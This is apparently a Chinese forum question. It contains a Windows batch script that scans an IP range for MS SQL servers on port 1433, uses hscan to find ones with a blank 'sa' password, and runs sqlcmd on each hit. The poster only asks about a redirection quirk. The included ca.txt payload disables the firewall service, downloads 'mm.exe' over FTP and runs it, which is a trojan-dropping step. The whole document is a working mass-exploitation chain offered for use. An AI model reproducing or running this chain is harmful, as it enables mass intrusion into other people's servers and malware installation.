echo===================================
set /p startip=请输入你要扫描的开始IP:
set /p endip=请输入你要扫描的结束IP:
set /p max=请输入扫描的线程:
echo==================================
S syn %startip% %endip% 1433 %max% /save
for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>ip.txt
hscan -f ip.txt -mssql
del result.txt
del s1.txt
del s2.txt
del ip.txt
cd log
for /f "tokens=1 delims=@" %%i in (hscan.log) do echo %%i >>ip2.txt
for /f %%i in (ip2.txt) do echo sqlcmd %%i "sa" "" ^< ca.txt >%%i.bat
dir /b /s *.bat >bat.txt
for /f %%i in (bat.txt) do start %%i
del ip2.txt
del *.bat
del bat.txt
del hscan.log
以上为完整代码,关键在这一行
for /f %%i in (ip2.txt) do echo sqlcmd %%i "sa" "" ^< ca.txt >%%i.bat
因为1433利用工具hscan的利用格式为sqlcmd ip user pass
我想要的结果就是%%i.bat内容为
sqlcmd ip "sa" "" < sa.txt
测试以下代码可行,
for /f %%i in (ip2.txt) do echo sqlcmd %%i "sa" "" ^< ca.txt >%%i.bat
但是我是为什么每次运行的时候他在CMD下都变成了
sqlcmd ip "sa" "" 0<ca.txt
ca.txt是ftp传马用到的文本,如下:
echo ftp www.ftp.com >ftp.txt
echo user >>ftp.txt
echo pass >>ftp.txt
echo binary >>ftp.txt
echo get mm.exe >>ftp.txt
echo bye >>ftp.txt
net stop sharedaccess
ftp -s:ftp.txt
mm.exe
mm.exe
exit
exit